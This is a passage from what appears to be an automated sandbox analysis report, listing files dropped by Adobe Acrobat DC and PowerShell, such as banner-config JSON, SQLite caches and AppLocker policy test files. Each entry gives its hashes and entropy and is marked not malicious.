                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.2722945078508285
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJf8dPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGU8Ukee9
                                                                                            MD5:7496FF6961CD7633C9745A7D150BE774
                                                                                            SHA1:246ED508585E14328D2BBCEA131BA38389676D15
                                                                                            SHA-256:492491FE8A3EBC76CCAAB6C7549072DEE769D6BA5925459309525DF9904ECFE4
                                                                                            SHA-512:431E548095D179E41442CA9909BF3E43B9D31F583B24A6BF5D346AD0475FEB5B0BE13B35DEDBDE38A13D8AD2F961AD2392F60DE7E014D33662B110CD402214A7
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.270185396030335
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfQ1rPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGY16Ukee9
                                                                                            MD5:AA71EC793DFE0FE9551A587628928146
                                                                                            SHA1:8098CD414D566DD041110EDA420C463665838840
                                                                                            SHA-256:CB6D12C0761A2A4CF4A7AA47193BD5130BBF570D5675CAF5B170ADD5A1DCC0CE
                                                                                            SHA-512:E7B956992AA7327CAE317D2CA8895B9BD789B073763CE601A078F3AD1EAE436D38941CB2BB8A51FCB8814785097D29ADB2A81FC6C46CE6047B5DEBEB01D6A144
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.287767253981597
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfFldPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGz8Ukee9
                                                                                            MD5:8B9F0E36929B02584B8B871F7D6966B5
                                                                                            SHA1:0023B80FA7BC70725595C4EE882A59B4A4950C88
                                                                                            SHA-256:A956D0B52960170A9AF69B443162E024DFDE633647B6AD146E77A1EA7F7BB82B
                                                                                            SHA-512:592F72A223CCB642C7463CAD7D8100641D7084C70430E8CC194AEAC3D8E09A751B7AB7ED74522B91926A60650992DEE4C9132FCA56965FA9EFB00A4A4A3187FF
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.300103688579784
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfzdPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGb8Ukee9
                                                                                            MD5:4041EDC59A7AEED290879E4E62CBE642
                                                                                            SHA1:7A15641FECA31E02A519212B46CE288F9E352926
                                                                                            SHA-256:4EA4D01A17C73AD40531B36EAAD248A5823B7EB99988C2E796FCD7B5BD5BB95D
                                                                                            SHA-512:6382595C4E5AD9742C649DCD50E0833346A8AB56F0286EC9569A0CF092BB76FAB790B0E1D905F0FD07C860EDA87550EEB77A50DE917BA1F61B1654F5D5C4CB34
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.280347571166507
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfYdPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGg8Ukee9
                                                                                            MD5:0F08A11DA6F38CA652FE38A7683BD28A
                                                                                            SHA1:4E1A702CBF0BCB244561A7549649C5AD4ACF2CFC
                                                                                            SHA-256:CF5372E7A7C5C87493F971C13D4827FEA0589A4FB8E34A62B79E043A4323CE14
                                                                                            SHA-512:3A507FF8ABD71258629F839D4B8BCD9CB3EB6095C323DDB5EE0ADB31CD748C4788BE13535164F1E0FA408951BC04DC2A20279A8ED25C6624AF99F0556B4B22B4
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):284
                                                                                            Entropy (8bit):5.267154893056928
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJf+dPeUkwRe9:YvXKXFGAUP62vR/ZwHACnG28Ukee9
                                                                                            MD5:06B578BB1A8D8F79EC7988C8EA20001F
                                                                                            SHA1:6AB66891C2C0452DB58C9881BD8DC11FCB022B77
                                                                                            SHA-256:BFD3234AC34CD57D525735F9A07B3CE480ACD2861B0378AE9BC20EF6FE9FCF61
                                                                                            SHA-512:7C0A4F2478541BF0D25ABA2ADF982AA479A264E754C374ADC61F04B2418934B7F92AF68EA8F3FF2770D3842F58A387D5056A1922CE5FDAA18002782A8981DC02
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.264029737079775
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfbPtdPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGDV8Ukee9
                                                                                            MD5:4A9B8D441C960E185C49F11197E9DA55
                                                                                            SHA1:7B80005D6D928317F1C8AE0F05471CF4C6AADD14
                                                                                            SHA-256:6F56AEB57ACA5903FC9F75E385DF195E2C58BB2C42EA0592110705BB31B9E0D1
                                                                                            SHA-512:3A192EFAE7E88140556189C51E121A4C2AFF5678274B638CCD5EE369229D81BB8495DE1D554719DED0299B34EA08339BBC8B113DB88C54011865D0CF1D02EC5C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):287
                                                                                            Entropy (8bit):5.262800667357767
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJf21rPeUkwRe9:YvXKXFGAUP62vR/ZwHACnG+16Ukee9
                                                                                            MD5:4412B554D4392F51D0C6942A0E6791EC
                                                                                            SHA1:DAA3F0980A522AAEB997F52ADA879C78A2D2751C
                                                                                            SHA-256:3D340DBC81E3A5A02F2CD677A06147AA968E8067CAA48D70C5DB858A83347C5D
                                                                                            SHA-512:171E61C72CC530C0F24DB0BCAA533E533D596F1FE1E3CA745BFED92C08F13FF21111C2D374051CA35AF451B5207A831AB40F508D477EA987015F2F6A1795E0F1
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1090
                                                                                            Entropy (8bit):5.658523406023469
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X8AUP62Jh/amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSO:Yv1A/2JhXBgkDMUJUAh8cvMO
                                                                                            MD5:457CFB4B8B64A0802741A916C85509B3
                                                                                            SHA1:DEF74EAE19186BB1589AA7C2202BA305139FBF99
                                                                                            SHA-256:E2809453D53B4E52142DFBEA8538C89D38A4D8C604E05F6E119DBCB0378EAB13
                                                                                            SHA-512:9041105413BECF52F08971F244A99514DB08DC97430DE989D7AA323343C0923A8F892F18050FF542ECD8D0C46FBD2225A42952712D0E7A08BFC6F12185102773
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):5.239151539117832
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJfshHHrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGUUUkee9
                                                                                            MD5:9CF971B9ED8D6280AB5AB62B4BA55EE3
                                                                                            SHA1:C98F3697CB19A1DF3AEDE1AEEE0F2275B3136CDC
                                                                                            SHA-256:FF93649ADB878B78C908177ED823ED6DFE3EB5EA7F2DA79817E68852014216B7
                                                                                            SHA-512:474DA131946C7232099A589F6C268ED72BBAF1005690A7E95A6CE23ADBCE83E8614B56376AB04827708621E5E6E631A6E96959495EAB1C2E80779D18D2932A8B
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):282
                                                                                            Entropy (8bit):5.261752014727189
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXaMFGAUP62vB3/dVlPIHAR0YDaUoAvJTqgFCrPeUkwRe9:YvXKXFGAUP62vR/ZwHACnGTq16Ukee9
                                                                                            MD5:5EF42401DC1124AFA0537A9D21A20E70
                                                                                            SHA1:64AC9B7F8FC5F5DC9C49CD8F26BF2BD280398546
                                                                                            SHA-256:4218CAF010767C9ED7DF1E4788AC248E05C27A377C17C246E6E5BDA56DACA183
                                                                                            SHA-512:30F6FBAA1E98B82A5B8772E1C33F81F6D3F56771DDADC153FE8F710B9E6142B220C26886F8AC29C96FE5FE6779EEBF5AA0A12C032DFD23168393423D1505F3F5
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"a3342bfe-b5c3-4ef5-bce1-eabe12326d30","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734787679995,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):0.8112781244591328
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:e:e
                                                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                            Malicious:false
                                                                                            Preview:....

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2814
                                                                                            Entropy (8bit):5.124847692038648
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:Y5JWFTMjShNQ6leT5uDjLEEMSdvAF9wQz:UJWFTM2Q6IT5uIdwvkwQz
                                                                                            MD5:91BEB1CF3627DF71CC5442F7B61B15DC
                                                                                            SHA1:C1650295B9638287321C7A6860113CCD35491D42
                                                                                            SHA-256:4F0F01CA011D136B0210BCBC06ED48973AC2280625514BC033C9BA0C8CCA9065
                                                                                            SHA-512:8EC389B1F7B567548954B2D0F6964DFFB727EDF279C26066C3A7326010B86ADA8D91F9D9DE44B8CDA78F15EED56688BB42F293275AE040D46B4948D00404F1E1
                                                                                            Malicious:false
                                                                                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"6ef3d92bcaf0d1bac8e60cccdd506b6d","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734609059000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"0f231ef0f5050200afeab4d9c69639f4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734609059000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c4a45a255cf81a7231a198d681fb4de7","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734609059000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"65cf2a21d5626675cdacd434229db536","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734609059000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"8ae68927ec23f135fdeae9efaa7bd8d5","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734609059000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"70f0b2be971a65f5bc321ceb2faf8b3d","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                            Category:dropped
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):1.318048930431809
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:TGufl2GL7ms9WR1CPmPbPahIAVypilIiAt:lNVms9WfMwbPahFVct
                                                                                            MD5:D1576B9C36EAB45F135B80259F718707
                                                                                            SHA1:FD682C78FEE89247D907E40936E4F965450F497D
                                                                                            SHA-256:320CB158CEC9E9E803771BE9BF6C849E79B5A986437BB1762A3CD8A61D42C3C9
                                                                                            SHA-512:E321F6F3574D0B4D08CCA2EFC973FB42AD4FEA6378221876233ED098C90CBE468C5B21672B59035E8F683F81AE8682902E29AD428F026658F3CAD4497203AE9A
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):1.780172401335634
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:7MqWR1CPmPbPahIAQypilIMqFl2GL7ms5:7TWfMwbPahFQNKVms5
                                                                                            MD5:A9B4AFF39200AAC4E437A3E4B44577C0
                                                                                            SHA1:F3B00101329323CBEAF9E64F9755B1688EAC24B3
                                                                                            SHA-256:43DC3A18F66A0BF6D2A2A3956FF1795A8D7A0C18A87D81EF0F1BF5F63708D4FF
                                                                                            SHA-512:8C64C41FCD1DEA88263C72DACD25CBDD685BEDFE2E90868A0FE0D00AB87675E3BE56576B1F636324CCB2B8F91BFCB4F14BB3B08565A91C22D6AC77D43FAEB218
                                                                                            Malicious:false
                                                                                            Preview:.... .c......n...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66726
                                                                                            Entropy (8bit):5.392739213842091
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEg1PDZzZ7ClPsyIyecVfvUcNwXRYyu:6a6TZ44ADE1PDZzNClmyVnMK
                                                                                            MD5:D586DD978DC5C8C3D469535356F584A6
                                                                                            SHA1:047C4CE65807355A56E1C6A6A36AB926607E0B24
                                                                                            SHA-256:960D95BCD603D1CBDDCB5FB4CF3B24C4FD1743016EB204E4044E4C9E39620BAC
                                                                                            SHA-512:7D1A19BAC182D376B5562A6C1C803EEE446DF7909AF123FB2F6945631EA0BF5E6960F1AB1BEE33763D452FFCC4024E4F8103E900B6BAD4FEB5E046362406B477
                                                                                            Malicious:false
                                                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulT/Et/Z:NllUA
                                                                                            MD5:68534726499B237218CD6D499AFF54E9
                                                                                            SHA1:8826365E26F51534ED2FF4E576A8ED3E6B4C0A2A
                                                                                            SHA-256:6B7B680E749AE616DE27D370135FBDE254E440FCD90EC1FCF9927EAF6739D5F8
                                                                                            SHA-512:29405FD901AB27EB64FAA068D94C1B2F024DBB9D6215D3C8E08BAB8E6553F44748A8AE330DCC1EC6234B54E1A8A38DF525CCF0F1BC097E872BD97AB304B719D1
                                                                                            Malicious:false
                                                                                            Preview:@...e................................................@..........

                                                                                            C:\Users\user\AppData\Local\Temp\MSI379.LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.5309417490522437
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAz9:Qw946cPbiOxDlbYnuRKr9
                                                                                            MD5:B250785B3C50142AFB18608FB69112DA
                                                                                            SHA1:F2161F8882A762E4D7753683BAC023A299D1925F
                                                                                            SHA-256:F8CC496F11161B5D50411F461CC2FE4829BC204F61DABB34C04C0DB3597A0B24
                                                                                            SHA-512:0F7E9225E9C9260C795C05BADF976093A7EC6639618839F002CF88473090B3DFD3653C1EDFA82C889FD4043DA3AE274E219A2D92FA33041B601CFF53073281D1
                                                                                            Malicious:false
                                                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.0.:.5.4. .=.=.=.....

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4s4jymmy.vx3.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw5zafm4.zqy.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
